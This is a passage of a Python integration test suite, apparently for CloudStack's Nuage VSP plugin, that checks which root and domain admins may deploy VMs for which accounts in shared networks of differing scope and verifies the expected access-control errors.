vm.state == "Running" and vm.account == self.account_d11a.name and
vm.domainid == self.account_d11a.domainid,
True,
"ROOT admin is NOT able to deploy a VM for domain user in a "
"shared network with scope=domain with subdomain access")
self.verify_vsd_shared_network(
self.account_d11a.domainid,
self.shared_network_domain_with_subdomain_d11,
gateway=self.nuagenetworkdata[
"network_domain_with_subdomain_access"]["gateway"])
subnet_id = self.get_subnet_id(
self.shared_network_domain_with_subdomain_d11.id,
self.nuagenetworkdata[
"network_domain_with_subdomain_access"]["gateway"])
self.verify_vsd_enterprise_vm(
self.account_d11a.domainid,
self.shared_network_domain_with_subdomain_d11,
vm, sharedsubnetid=subnet_id)
# Deleting the VM
vm.delete(self.api_client, expunge=True)
@attr(tags=["advanced", "nuagevsp"], required_hardware="false")
def test_deployVM_in_sharedNetwork_as_admin_subdomaccess_domainadminuser(
self):
"""Validate that ROOT admin is able to deploy a VM for domain admin
user in a shared network with scope=domain with subdomain access
"""
# Deploy VM as an admin user in a domain that has shared network with
# subdomain access
self.api_client.connection.apiKey = self.default_apikey
self.api_client.connection.securityKey = self.default_secretkey
self.vmdata["name"] = \
self.sharednetworkdata["vmD11"]["name"] + \
"-shared-scope-domain-withsubdomainaccess-root-admin"
self.vmdata["displayname"] = \
self.sharednetworkdata["vmD11"]["displayname"] + \
"-shared-scope-domain-withsubdomainaccess-root-admin"
vm = self.create_VM(self.shared_network_domain_with_subdomain_d11,
testdata=self.vmdata, account=self.account_d11,
cleanup=False)
self.assertEqual(
vm.state == "Running" and vm.account == self.account_d11.name and
vm.domainid == self.account_d11.domainid,
True,
"ROOT admin is not able to deploy a VM for domain admin user in a "
"shared network with scope=domain with subdomain access")
self.verify_vsd_shared_network(
self.account_d11.domainid,
self.shared_network_domain_with_subdomain_d11,
gateway=self.nuagenetworkdata[
"network_domain_with_subdomain_access"]["gateway"])
subnet_id = self.get_subnet_id(
self.shared_network_domain_with_subdomain_d11.id,
self.nuagenetworkdata[
"network_domain_with_subdomain_access"]["gateway"])
self.verify_vsd_enterprise_vm(
self.account_d11.domainid,
self.shared_network_domain_with_subdomain_d11,
vm, sharedsubnetid=subnet_id)
# Deleting the VM
vm.delete(self.api_client, expunge=True)
@attr(tags=["advanced", "nuagevsp"], required_hardware="false")
def test_deployVM_in_sharedNetwork_as_admin_subdomaccess_subdomainuser(
self):
"""Validate that ROOT admin is able to deploy a VM for subdomain user
in a shared network with scope=domain with subdomain access
"""
# Deploy VM as user in a subdomain under a domain that has shared
# network with subdomain access
self.api_client.connection.apiKey = self.default_apikey
self.api_client.connection.securityKey = self.default_secretkey
self.vmdata["name"] = \
self.sharednetworkdata["vmD111A"]["name"] + \
"-shared-scope-domain-withsubdomainaccess-root-admin"
self.vmdata["displayname"] = \
self.sharednetworkdata["vmD111A"]["displayname"] + \
"-shared-scope-domain-withsubdomainaccess-root-admin"
vm = self.create_VM(self.shared_network_domain_with_subdomain_d11,
testdata=self.vmdata, account=self.account_d111a,
cleanup=False)
self.assertEqual(
vm.state == "Running" and vm.account == self.account_d111a.name and
vm.domainid == self.account_d111a.domainid,
True,
"ROOT admin is not able to deploy a VM for subdomain user in a "
"shared network with scope=domain with subdomain access")
self.verify_vsd_shared_network(
self.account_d111a.domainid,
self.shared_network_domain_with_subdomain_d11,
gateway=self.nuagenetworkdata[
"network_domain_with_subdomain_access"]["gateway"])
subnet_id = self.get_subnet_id(
self.shared_network_domain_with_subdomain_d11.id,
self.nuagenetworkdata[
"network_domain_with_subdomain_access"]["gateway"])
self.verify_vsd_enterprise_vm(
self.account_d111a.domainid,
self.shared_network_domain_with_subdomain_d11,
vm, sharedsubnetid=subnet_id)
# Deleting the VM
vm.delete(self.api_client, expunge=True)
@attr(tags=["advanced", "nuagevsp"], required_hardware="false")
def test_deployVM_in_sharedNetwork_as_admin_subdomaccess_subdomainadmin(
self):
"""Validate that ROOT admin is able to deploy a VM for subdomain admin
user in a shared network with scope=domain with subdomain access
"""
# Deploy VM as an admin user in a subdomain under a domain that has
# shared network with subdomain access
self.api_client.connection.apiKey = self.default_apikey
self.api_client.connection.securityKey = self.default_secretkey
self.vmdata["name"] = \
self.sharednetworkdata["vmD111"]["name"] + \
"-shared-scope-domain-withsubdomainaccess-root-admin"
self.vmdata["displayname"] = \
self.sharednetworkdata["vmD111"]["displayname"] + \
"-shared-scope-domain-withsubdomainaccess-root-admin"
vm = self.create_VM(self.shared_network_domain_with_subdomain_d11,
testdata=self.vmdata, account=self.account_d111,
cleanup=False)
self.assertEqual(
vm.state == "Running" and vm.account == self.account_d111.name and
vm.domainid == self.account_d111.domainid,
True,
"ROOT admin is not able to deploy VM for subdomain admin user in "
"a shared network with scope=domain subdomain access")
self.verify_vsd_shared_network(
self.account_d111.domainid,
self.shared_network_domain_with_subdomain_d11,
gateway=self.nuagenetworkdata[
"network_domain_with_subdomain_access"]["gateway"])
subnet_id = self.get_subnet_id(
self.shared_network_domain_with_subdomain_d11.id,
self.nuagenetworkdata[
"network_domain_with_subdomain_access"]["gateway"])
self.verify_vsd_enterprise_vm(
self.account_d111.domainid,
self.shared_network_domain_with_subdomain_d11,
vm, sharedsubnetid=subnet_id)
# Deleting the VM
vm.delete(self.api_client, expunge=True)
@attr(tags=["advanced", "nuagevsp"], required_hardware="false")
def test_deployVM_in_sharedNetwork_as_admin_subdomaccess_parentdomainuser(
self):
"""Validate that ROOT admin is NOT able to deploy a VM for parent
domain user in a shared network with scope=domain with subdomain access
"""
# Deploy VM as user in parentdomain of a domain that has shared network
# with subdomain access
self.api_client.connection.apiKey = self.default_apikey
self.api_client.connection.securityKey = self.default_secretkey
self.vmdata["name"] = \
self.sharednetworkdata["vmD1A"]["name"] + \
"-shared-scope-domain-withsubdomainaccess-root-admin"
self.vmdata["displayname"] = \
self.sharednetworkdata["vmD1A"]["displayname"] + \
"-shared-scope-domain-withsubdomainaccess-root-admin"
try:
VirtualMachine.create(
self.api_client,
self.vmdata,
zoneid=self.zone.id,
serviceofferingid=self.service_offering.id,
templateid=self.template.id,
networkids=self.shared_network_domain_with_subdomain_d11.id,
accountid=self.account_d1a.name,
domainid=self.account_d1a.domainid
)
self.fail(
"ROOT admin is NOT able to deploy a VM for parent domain user "
"in a shared network with scope=domain with subdomain access")
except Exception as e:
self.debug(
"When a user from parent domain deploys a VM in a shared "
"network with scope=domain with subdomain access %s" % e)
if not CloudstackAclException.verifyMsginException(
e,
CloudstackAclException.NOT_AVAILABLE_IN_DOMAIN):
self.fail(
"Error message validation failed when ROOT admin tries to "
"deploy a VM for parent domain user in a shared network "
"with scope=domain with subdomain access ")
@attr(tags=["advanced", "nuagevsp"], required_hardware="false")
def test_deployVM_in_sharedNetwork_as_admin_subdomaccess_parentdomainadmin(
self):
"""Validate that ROOT admin is NOT able to deploy a VM for parent
domain admin user in a shared network with scope=domain with subdomain
access
"""
# Deploy VM as an admin user in parentdomain of a domain that has
# shared network with subdomain access
self.api_client.connection.apiKey = self.default_apikey
self.api_client.connection.securityKey = self.default_secretkey
self.vmdata["name"] = \
self.sharednetworkdata["vmD1"]["name"] + \
"-shared-scope-domain-withsubdomainaccess-root-admin"
self.vmdata["displayname"] = \
self.sharednetworkdata["vmD1"]["displayname"] + \
"-shared-scope-domain-withsubdomainaccess-root-admin"
try:
VirtualMachine.create(
self.api_client,
self.vmdata,
zoneid=self.zone.id,
serviceofferingid=self.service_offering.id,
templateid=self.template.id,
networkids=self.shared_network_domain_with_subdomain_d11.id,
accountid=self.account_d1.name,
domainid=self.account_d1.domainid
)
self.fail(
"ROOT admin is able to deploy VM for parent domain admin user "
"in a shared network with scope=domain subdomain access ")
except Exception as e:
self.debug(
"When an admin user from parent domain deploys a VM in a "
"shared network with scope=domain with subdomain access %s" %
e)
if not CloudstackAclException.verifyMsginException(
e,
CloudstackAclException.NOT_AVAILABLE_IN_DOMAIN):
self.fail(
"Error message validation failed when ROOT admin tries to "
"deploy a VM for parent domain admin user in a shared "
"network with scope=domain with subdomain access ")
@attr(tags=["advanced", "nuagevsp"], required_hardware="false")
def test_deployVM_in_sharedNetwork_as_admin_subdomaccess_ROOTuser(self):
"""Validate that ROOT admin is NOT able to deploy a VM for user in ROOT
domain in a shared network with scope=domain with subdomain access
"""
# Deploy VM as user in ROOT domain
self.api_client.connection.apiKey = self.user_roota_apikey
self.api_client.connection.securityKey = self.user_roota_secretkey
self.vmdata["name"] = \
self.sharednetworkdata["vmROOTA"]["name"] + \
"-shared-scope-domain-withsubdomainaccess-root-admin"
self.vmdata["displayname"] = \
self.sharednetworkdata["vmROOTA"]["displayname"] + \
"-shared-scope-domain-withsubdomainaccess-root-admin"
try:
VirtualMachine.create(
self.api_client,
self.vmdata,
zoneid=self.zone.id,
serviceofferingid=self.service_offering.id,
templateid=self.template.id,
networkids=self.shared_network_domain_with_subdomain_d11.id,
accountid=self.account_roota.name,
domainid=self.account_roota.domainid
)
self.fail(
"ROOT admin is able to deploy a VM for user in ROOT domain in "
"a shared network with scope=domain with subdomain access")
except Exception as e:
self.debug(
"When a user from ROOT domain deploys a VM in a shared "
"network with scope=domain with subdomain access %s" % e)
if not CloudstackAclException.verifyMsginException(
e,
CloudstackAclException.NOT_AVAILABLE_IN_DOMAIN):
self.fail(
"Error message validation failed when ROOT admin tries to "
"deploy a VM for user in ROOT domain in a shared network "
"with scope=domain with subdomain access")
# Test cases relating to deploying Virtual Machine as ROOT admin for other
# users in shared network with scope=account
@attr(tags=["advanced", "nuagevsp"], required_hardware="false")
def test_deployVM_in_sharedNetwork_as_admin_scope_account_domainuser(self):
"""Validate that ROOT admin is NOT able to deploy a VM for user in the
same domain but in a different account in a shared network with
scope=account
"""
# Deploy VM as user in a domain under the same domain but different
# account from the account that has a shared network with scope=account
self.api_client.connection.apiKey = self.default_apikey
self.api_client.connection.securityKey = self.default_secretkey
self.vmdata["name"] = \
self.sharednetworkdata["vmD111B"]["name"] + \
"-shared-scope-domain-withsubdomainaccess-root-admin"
self.vmdata["displayname"] = \
self.sharednetworkdata["vmD111B"]["displayname"] + \
"-shared-scope-domain-withsubdomainaccess-root-admin"
try:
VirtualMachine.create(
self.api_client,
self.vmdata,
zoneid=self.zone.id,
serviceofferingid=self.service_offering.id,
templateid=self.template.id,
networkids=self.shared_network_account_d111a.id,
accountid=self.account_d111b.name,
domainid=self.account_d111b.domainid
)
self.fail(
"ROOT admin is able to deploy VM for user in the same domain "
"but in different account in shared network scope=account")
except Exception as e:
self.debug(
"When a user from same domain but different account deploys a "
"VM in a shared network with scope=account %s" % e)
if not CloudstackAclException.verifyMsginException(
e,
CloudstackAclException.UNABLE_TO_USE_NETWORK):
self.fail(
"Error message validation failed when ROOT admin tries to "
"deploy a VM for user in the same domain but in a "
"different account in a shared network with scope=account")
@attr(tags=["advanced", "nuagevsp"], required_hardware="false")
def test_deployVM_in_sharedNetwork_as_admin_scope_account_domainadminuser(
self):
"""Validate that ROOT admin is NOT able to deploy a VM for admin user
in the same domain but in a different account in a shared network with
scope=account
"""
# Deploy VM as admin user for a domain that has an account with shared
# network with scope=account
self.api_client.connection.apiKey = self.default_apikey
self.api_client.connection.securityKey = self.default_secretkey
self.vmdata["name"] = \
self.sharednetworkdata["vmD111"]["name"] + \
"-shared-scope-domain-withsubdomainaccess-root-admin"
self.vmdata["displayname"] = \
self.sharednetworkdata["vmD111"]["displayname"] + \
"-shared-scope-domain-withsubdomainaccess-root-admin"
try:
VirtualMachine.create(
self.api_client,
self.vmdata,
zoneid=self.zone.id,
serviceofferingid=self.service_offering.id,
templateid=self.template.id,
networkids=self.shared_network_account_d111a.id,
accountid=self.account_d111.name,
domainid=self.account_d111.domainid
)
self.fail(
"ROOT admin is able to deploy VM for admin user in same "
"domain but in different account in shared network with "
"scope=account")
except Exception as e:
self.debug(
"When a user from same domain but different account deploys a "
"VM in a shared network with scope=account %s" % e)
if not CloudstackAclException.verifyMsginException(
e,
CloudstackAclException.UNABLE_TO_USE_NETWORK):
self.fail(
"Error message validation failed when ROOT admin tries to "
"deploy a VM for admin user in the same domain but in a "
"different account in a shared network with scope=account")
@attr(tags=["advanced", "nuagevsp"], required_hardware="false")
def test_deployVM_in_sharedNetwork_as_admin_scope_account_user(self):
"""Validate that ROOT admin is able to deploy a VM for regular user in
a shared network with scope=account
"""
# Deploy VM as account with shared network with scope=account
self.api_client.connection.apiKey = self.default_apikey
self.api_client.connection.securityKey = self.default_secretkey
self.vmdata["name"] = \
self.sharednetworkdata["vmD111A"]["name"] + \
"-shared-scope-domain-withsubdomainaccess-root-admin"
self.vmdata["displayname"] = \
self.sharednetworkdata["vmD111A"]["displayname"] + \
"-shared-scope-domain-withsubdomainaccess-root-admin"
vm = self.create_VM(self.shared_network_account_d111a,
testdata=self.vmdata, account=self.account_d111a,
cleanup=False)
self.assertEqual(
vm.state == "Running" and vm.account == self.account_d111a.name and
vm.domainid == self.account_d111a.domainid,
True,
"ROOT admin is not able to deploy a VM for regular user in a "
"shared network with scope=account")
self.verify_vsd_shared_network(self.account_d111a.domainid,
self.shared_network_account_d111a,
gateway=self.nuagenetworkdata[
"network_account"]["gateway"])
subnet_id = self.get_subnet_id(self.shared_network_account_d111a.id,
self.nuagenetworkdata[
"network_account"]["gateway"])
self.verify_vsd_enterprise_vm(self.account_d111a.domainid,
self.shared_network_account_d111a, vm,
sharedsubnetid=subnet_id)
# Deleting the VM
vm.delete(self.api_client, expunge=True)
@attr(tags=["advanced", "nuagevsp"], required_hardware="false")
def test_deployVM_in_sharedNetwork_as_admin_scope_account_differentdomain(
self):
"""Validate that ROOT admin is NOT able to deploy a VM for a admin user
in a shared network with scope=account which the admin user does not
have access to
"""
# Deploy VM as an admin user in a subdomain under ROOT
self.api_client.connection.apiKey = self.default_apikey
self.api_client.connection.securityKey = self.default_secretkey
self.vmdata["name"] = \
self.sharednetworkdata["vmD2A"]["name"] + \
"-shared-scope-account-root-admin"
self.vmdata["displayname"] = \
self.sharednetworkdata["vmD2A"]["displayname"] + \
"-shared-scope-account-root-admin"
try:
VirtualMachine.create(
self.api_client,
self.vmdata,
zoneid=self.zone.id,
serviceofferingid=self.service_offering.id,
templateid=self.template.id,
networkids=self.shared_network_account_d111a.id,
accountid=self.account_d2a.name,
domainid=self.account_d2a.domainid
)
self.fail(
"ROOT admin is able to deploy VM for admin user in shared "
"network scope=account which admin user does not have access")
except Exception as e:
self.debug("account %s" % e)
if not CloudstackAclException.verifyMsginException(
e,
CloudstackAclException.UNABLE_TO_USE_NETWORK):
self.fail(
"Error message validation failed when ROOT admin tries to "
"deploy a VM for a admin user in a shared network with "
"scope=account which the admin user does not have access "
"to ")
@attr(tags=["advanced", "nuagevsp"], required_hardware="false")
def test_deployVM_in_sharedNetwork_as_admin_scope_account_ROOTuser(self):
"""Validate that ROOT admin is NOT able to deploy a VM for a user in
ROOT domain in a shared network with scope=account which the user does
not have access to
"""
# Deploy VM as user in ROOT domain
self.api_client.connection.apiKey = self.default_apikey
self.api_client.connection.securityKey = self.default_secretkey
self.vmdata["name"] = \
self.sharednetworkdata["vmROOTA"]["name"] + \
"-shared-scope-account-root-admin"
self.vmdata["displayname"] = \
self.sharednetworkdata["vmROOTA"]["displayname"] + \
"-shared-scope-account-root-admin"
try:
VirtualMachine.create(
self.api_client,
self.vmdata,
zoneid=self.zone.id,
serviceofferingid=self.service_offering.id,
templateid=self.template.id,
networkids=self.shared_network_account_d111a.id,
accountid=self.account_roota.name,
domainid=self.account_roota.domainid
)
self.fail(
"ROOT admin is able to deploy VM for a user in ROOT domain in "
"shared network scope=account which user does not have access")
except Exception as e:
self.debug(
"When a user from ROOT domain deploys a VM in a shared "
"network with scope=account %s" % e)
if not CloudstackAclException.verifyMsginException(
e,
CloudstackAclException.UNABLE_TO_USE_NETWORK):
self.fail(
"Error message validation failed when ROOT admin tries to "
"deploy a VM for a user in ROOT domain in a shared "
"network with scope=account which the user does not have "
"access to ")
# Test cases relating to deploying Virtual Machine as Domain admin for
# other users in shared network with scope=all
@attr(tags=["advanced", "nuagevsp"], required_hardware="false")
def test_deployVM_in_sharedNetwork_as_domainadmin_scope_all_domainuser(
self):
"""Validate that Domain admin is able to deploy a VM for a domain user
in a shared network with scope=all
"""
# Deploy VM for a user in a domain under ROOT as admin
self.api_client.connection.apiKey = self.user_d1_apikey
self.api_client.connection.securityKey = self.user_d1_secretkey
self.vmdata["name"] = \
self.sharednetworkdata["vmD1A"]["name"] + \
"-shared-scope-all-domain-admin"
self.vmdata["displayname"] = \
self.sharednetworkdata["vmD1A"]["displayname"] + \
"-shared-scope-all-domain-admin"
vm = self.create_VM(self.shared_network_all, testdata=self.vmdata,
account=self.account_d1a, cleanup=False)
self.assertEqual(
vm.state == "Running" and vm.account == self.account_d1a.name and
vm.domainid == self.account_d1a.domainid,
True,
"Domain admin is not able to deploy a VM for a domain user in a "
"shared network with scope=all")
self.verify_vsd_shared_network(
self.account_d1a.domainid,
self.shared_network_all,
gateway=self.nuagenetworkdata["network_all"]["gateway"])
subnet_id = self.get_subnet_id(
self.shared_network_all.id,
self.nuagenetworkdata["network_all"]["gateway"])
self.verify_vsd_enterprise_vm(self.account_d1a.domainid,
self.shared_network_all, vm,
sharedsubnetid=subnet_id)
# Deleting the VM
vm.delete(self.api_client, expunge=True)
@attr(tags=["advanced", "nuagevsp"], required_hardware="false")
def test_deployVM_in_sharedNetwork_as_domainadmin_scope_all_domadminuser(
self):
"""Validate that Domain admin is able to deploy a VM for a domain admin
user in a shared network with scope=all
"""
# Deploy VM for an admin user in a domain under ROOT as admin
self.api_client.connection.apiKey = self.user_d1_apikey
self.api_client.connection.securityKey = self.user_d1_secretkey
self.vmdata["name"] = \
self.sharednetworkdata["vmD1"]["name"] + \
"-shared-scope-all-domain-admin"
self.vmdata["displayname"] = \
self.sharednetworkdata["vmD1"]["displayname"] + \
"-shared-scope-all-domain-admin"
vm = self.create_VM(self.shared_network_all, testdata=self.vmdata,
account=self.account_d1, cleanup=False)
self.assertEqual(
vm.state == "Running" and vm.account == self.account_d1.name and
vm.domainid == self.account_d1.domainid,
True,
"Domain admin is not able to deploy a VM for a domain admin user "
"in a shared network with scope=all")
self.verify_vsd_shared_network(
self.account_d1.domainid,
self.shared_network_all,
gateway=self.nuagenetworkdata["network_all"]["gateway"])
subnet_id = self.get_subnet_id(
self.shared_network_all.id,
self.nuagenetworkdata["network_all"]["gateway"])
self.verify_vsd_enterprise_vm(self.account_d1.domainid,
self.shared_network_all, vm,
sharedsubnetid=subnet_id)
# Deleting the VM
vm.delete(self.api_client, expunge=True)
@attr(tags=["advanced", "nuagevsp"], required_hardware="false")
def test_deployVM_in_sharedNetwork_as_domainadmin_scope_all_subdomainuser(
self):
"""Validate that Domain admin is able to deploy a VM for a sub domain
user in a shared network with scope=all
"""
# Deploy VM as user in a subdomain under ROOT
self.api_client.connection.apiKey = self.user_d1_apikey
self.api_client.connection.securityKey = self.user_d1_secretkey
self.vmdata["name"] = \
self.sharednetworkdata["vmD11A"]["name"] + \
"-shared-scope-all-domain-admin"
self.vmdata["displayname"] = \
self.sharednetworkdata["vmD11A"]["displayname"] + \
"-shared-scope-all-domain-admin"
vm = self.create_VM(self.shared_network_all, testdata=self.vmdata,
account=self.account_d11a, cleanup=False)
self.assertEqual(
vm.state == "Running" and vm.account == self.account_d11a.name and
vm.domainid == self.account_d11a.domainid,
True,
"Domain admin is not able to deploy a VM for a sub domain user in "
"a shared network with scope=all")
self.verify_vsd_shared_network(
self.account_d11a.domainid,
self.shared_network_all,
gateway=self.nuagenetworkdata["network_all"]["gateway"])
subnet_id = self.get_subnet_id(
self.shared_network_all.id,
self.nuagenetworkdata["network_all"]["gateway"])
self.verify_vsd_enterprise_vm(self.account_d11a.domainid,
self.shared_network_all, vm,
sharedsubnetid=subnet_id)
# Deleting the VM
vm.delete(self.api_client, expunge=True)
@attr(tags=["advanced", "nuagevsp"], required_hardware="false")
def test_deployVM_in_sharedNetwork_as_domainadmin_scope_all_subdomadmin(
self):
"""Validate that Domain admin is able to deploy a VM for a sub domain
admin user in a shared network with scope=all
"""
# Deploy VM as an admin user in a subdomain under ROOT
self.api_client.connection.apiKey = self.user_d1_apikey
self.api_client.connection.securityKey = self.user_d1_secretkey
self.vmdata["name"] = \
self.sharednetworkdata["vmD11"]["name"] + \
"-shared-scope-all-domain-admin"
self.vmdata["displayname"] = \
self.sharednetworkdata["vmD11"]["displayname"] + \
"-shared-scope-all-domain-admin"
vm = self.create_VM(self.shared_network_all, testdata=self.vmdata,
account=self.account_d11, cleanup=False)
self.assertEqual(
vm.state == "Running" and vm.account == self.account_d11.name and
vm.domainid == self.account_d11.domainid,
True,
"Domain admin is not able to deploy a VM for a sub domain admin "
"user in a shared network with scope=all")
self.verify_vsd_shared_network(
self.account_d11.domainid,
self.shared_network_all,
gateway=self.nuagenetworkdata["network_all"]["gateway"])
subnet_id = self.get_subnet_id(
self.shared_network_all.id,
self.nuagenetworkdata["network_all"]["gateway"])
self.verify_vsd_enterprise_vm(self.account_d11.domainid,
self.shared_network_all, vm,
sharedsubnetid=subnet_id)
@attr(tags=["advanced", "nuagevsp"], required_hardware="false")
def test_deployVM_in_sharedNetwork_as_domainadmin_scope_all_ROOTuser(self):
"""Validate that Domain admin is NOT able to deploy a VM for user in
ROOT domain in a shared network with scope=all
"""
# Deploy VM as user in ROOT domain
self.api_client.connection.apiKey = self.user_d1_apikey
self.api_client.connection.securityKey = self.user_d1_secretkey
self.vmdata["name"] = \
self.sharednetworkdata["vmROOTA"]["name"] + \
"-shared-scope-all"
self.vmdata["displayname"] = \
self.sharednetworkdata["vmROOTA"]["displayname"] + \
"-shared-scope-all"
try:
VirtualMachine.create(
self.api_client,
self.vmdata,
zoneid=self.zone.id,
serviceofferingid=self.service_offering.id,
templateid=self.template.id,
networkids=self.shared_network_all.id,
accountid=self.account_roota.name,
domainid=self.account_roota.domainid
)
self.fail(
"Domain admin is NOT able to deploy a VM for user in ROOT "
"domain in a shared network with scope=all")
except Exception as e:
self.debug(
"When a Domain admin user deploys a VM for ROOT user in a "
"shared network with scope=all %s" % e)
if not CloudstackAclException.verifyMsginException(
e,
CloudstackAclException.NO_PERMISSION_TO_OPERATE_DOMAIN):
self.fail(
"Error message validation failed when Domain admin is NOT "
"able to deploy a VM for user in ROOT domain in a shared "
"network with scope=all")
@attr(tags=["advanced", "nuagevsp"], required_hardware="false")
def test_deployVM_in_sharedNetwork_as_domainadmin_scope_all_crossdomuser(
self):
"""Validate that Domain admin is NOT able to deploy a VM for user in
other domain in a shared network with scope=all
"""
# Deploy VM as user in ROOT domain
self.api_client.connection.apiKey = self.user_d1_apikey
self.api_client.connection.securityKey = self.user_d1_secretkey
self.vmdata["name"] = \
self.sharednetworkdata["vmROOTA"]["name"] + "-shared-scope-all"
self.vmdata["displayname"] = \
self.sharednetworkdata["vmROOTA"]["displayname"] + \
"-shared-scope-all"
try:
VirtualMachine.create(
self.api_client,
self.vmdata,
zoneid=self.zone.id,
serviceofferingid=self.service_offering.id,
templateid=self.template.id,
networkids=self.shared_network_all.id,
accountid=self.account_d2a.name,
domainid=self.account_d2a.domainid
)
self.fail(
"Domain admin user is able to Deploy VM for a domain user he "
"does not have access to in a shared network with "
"scope=domain with no subdomain access ")
except Exception as e:
self.debug(
"When a Domain admin user deploys a VM for a domain user he "
"does not have access to in a shared network with "
"scope=domain with no subdomain access %s" % e)
if not CloudstackAclException.verifyMsginException(
e,
CloudstackAclException.NO_PERMISSION_TO_OPERATE_DOMAIN):
self.fail(
"Error mesage validation failed when Domain admin user "
"tries to Deploy VM for a domain user he does not have "
"access to in a shared network with scope=domain with no "
"subdomain access ")
# Test cases relating to deploying Virtual Machine as Domain admin for
# other users in shared network with scope=Domain and no subdomain access
@attr(tags=["advanced", "nuagevsp"], required_hardware="false")
def test_deployVM_in_sharedNetwork_as_domainadmin_nosubdomaccess_domuser(
self):
"""Validate that Domain admin is able to deploy a VM for domain user in
a shared network with scope=Domain and no subdomain access
"""
# Deploy VM as user in a domain that has shared network with no
# subdomain access
self.api_client.connection.apiKey = self.user_d1_apikey
self.api_client.connection.securityKey = self.user_d1_secretkey
self.vmdata["name"] = \
self.sharednetworkdata["vmD11A"]["name"] + \
"-shared-scope-domain-nosubdomainaccess-domain-admin"
self.vmdata["displayname"] = \
self.sharednetworkdata["vmD11A"]["displayname"] + \
"-shared-scope-domain-nosubdomainaccess-domain-admin"
vm = self.create_VM(self.shared_network_domain_d11,
testdata=self.vmdata, account=self.account_d11a,
cleanup=False)
self.assertEqual(
vm.state == "Running" and vm.account == self.account_d11a.name and
vm.domainid == self.account_d11a.domainid,
True,
"Domain admin is not able to deploy a VM for domain user in a "
"shared network with scope=Domain and no subdomain access")
self.verify_vsd_shared_network(
self.account_d11a.domainid,
self.shared_network_domain_d11,
gateway=self.nuagenetworkdata[
"network_domain_with_no_subdomain_access"]["gateway"])
subnet_id = self.get_subnet_id(
self.shared_network_domain_d11.id,
self.nuagenetworkdata[
"network_domain_with_no_subdomain_access"]["gateway"])
self.verify_vsd_enterprise_vm(self.account_d11a.domainid,
self.shared_network_domain_d11, vm,
sharedsubnetid=subnet_id)
# Deleting the VM
vm.delete(self.api_client, expunge=True)
    @attr(tags=["advanced", "nuagevsp"], required_hardware="false")
    def test_deployVM_in_sharedNetwork_as_domainadmin_nosubdomaccess_domadmin(
            self):
        """Validate that Domain admin is able to deploy a VM for domain admin
        user in a shared network with scope=Domain and no subdomain access
        """
        # Deploy VM as an admin user in a domain that has shared network with
        # no subdomain access
        # Act as the Domain admin (D1) by switching the API client keys.
        self.api_client.connection.apiKey = self.user_d1_apikey
        self.api_client.connection.securityKey = self.user_d1_secretkey
        self.vmdata["name"] = \
            self.sharednetworkdata["vmD11"]["name"] + \
            "-shared-scope-domain-nosubdomainaccess-domain-admin"
        self.vmdata["displayname"] = \
            self.sharednetworkdata["vmD11"]["displayname"] + \
            "-shared-scope-domain-nosubdomainaccess-domain-admin"
        # Expected to succeed: account D11 is in the network's own domain.
        vm = self.create_VM(self.shared_network_domain_d11,
                            testdata=self.vmdata, account=self.account_d11,
                            cleanup=False)
        self.assertEqual(
            vm.state == "Running" and vm.account == self.account_d11.name and
            vm.domainid == self.account_d11.domainid,
            True,
            "Admin User in a domain that has a shared network with no "
            "subdomain access failed to Deploy VM in a shared network with "
            "scope=domain with no subdomain access")
        # Cross-check the shared network and the VM on the Nuage VSD side.
        self.verify_vsd_shared_network(
            self.account_d11.domainid,
            self.shared_network_domain_d11,
            gateway=self.nuagenetworkdata[
                "network_domain_with_no_subdomain_access"]["gateway"])
        subnet_id = self.get_subnet_id(
            self.shared_network_domain_d11.id,
            self.nuagenetworkdata[
                "network_domain_with_no_subdomain_access"]["gateway"])
        # NOTE(review): unlike the sibling positive tests, this VM is not
        # deleted at the end — confirm cleanup is handled elsewhere.
        self.verify_vsd_enterprise_vm(self.account_d11.domainid,
                                      self.shared_network_domain_d11, vm,
                                      sharedsubnetid=subnet_id)
    @attr(tags=["advanced", "nuagevsp"], required_hardware="false")
    def test_deployVM_in_sharedNetwork_as_domainadmin_nosubdomaccess_subdomusr(
            self):
        """Validate that Domain admin is NOT able to deploy a VM for sub domain
        user in a shared network with scope=Domain and no subdomain access
        """
        # Deploy VM as user in a subdomain under a domain that has shared
        # network with no subdomain access
        # Act as the Domain admin (D1) by switching the API client keys.
        self.api_client.connection.apiKey = self.user_d1_apikey
        self.api_client.connection.securityKey = self.user_d1_secretkey
        self.vmdata["name"] = \
            self.sharednetworkdata["vmD111A"]["name"] + \
            "-shared-scope-domain-nosubdomainaccess-domain-admin"
        self.vmdata["displayname"] = \
            self.sharednetworkdata["vmD111A"]["displayname"] + \
            "-shared-scope-domain-nosubdomainaccess-domain-admin"
        # Deployment must be rejected: the network does not allow subdomain
        # access, and D111A lives in a subdomain.
        try:
            VirtualMachine.create(
                self.api_client,
                self.vmdata,
                zoneid=self.zone.id,
                serviceofferingid=self.service_offering.id,
                templateid=self.template.id,
                networkids=self.shared_network_domain_d11.id,
                accountid=self.account_d111a.name,
                domainid=self.account_d111a.domainid
            )
            self.fail(
                "Domain admin is able to deploy VM for sub domain user in a "
                "shared network with scope=Domain and no subdomain access")
        except Exception as e:
            self.debug(
                "When a user from a subdomain deploys a VM in a shared "
                "network with scope=domain with no subdomain access %s" % e)
            # Validate the failure is the expected ACL error, not some other
            # exception.
            if not CloudstackAclException.verifyMsginException(
                    e,
                    CloudstackAclException.NOT_AVAILABLE_IN_DOMAIN):
                self.fail(
                    "Error message validation failed when Domain admin tries "
                    "to deploy a VM for sub domain user in a shared network "
                    "with scope=Domain and no subdomain access")
    @attr(tags=["advanced", "nuagevsp"], required_hardware="false")
    def test_deployVM_in_sharedNetwork_as_domainadmin_nosubdomaccess_subdomadm(
            self):
        """Validate that Domain admin is NOT able to deploy a VM for sub domain
        admin user in a shared network with scope=Domain and no subdomain
        access
        """
        # Deploy VM as an admin user in a subdomain under a domain that has
        # shared network with no subdomain access
        # Act as the Domain admin (D1) by switching the API client keys.
        self.api_client.connection.apiKey = self.user_d1_apikey
        self.api_client.connection.securityKey = self.user_d1_secretkey
        self.vmdata["name"] = \
            self.sharednetworkdata["vmD111"]["name"] + \
            "-shared-scope-domain-nosubdomainaccess-domain-admin"
        self.vmdata["displayname"] = \
            self.sharednetworkdata["vmD111"]["displayname"] + \
            "-shared-scope-domain-nosubdomainaccess-domain-admin"
        # Deployment must be rejected: the network does not allow subdomain
        # access, and D111 lives in a subdomain.
        try:
            VirtualMachine.create(
                self.api_client,
                self.vmdata,
                zoneid=self.zone.id,
                serviceofferingid=self.service_offering.id,
                templateid=self.template.id,
                networkids=self.shared_network_domain_d11.id,
                accountid=self.account_d111.name,
                domainid=self.account_d111.domainid
            )
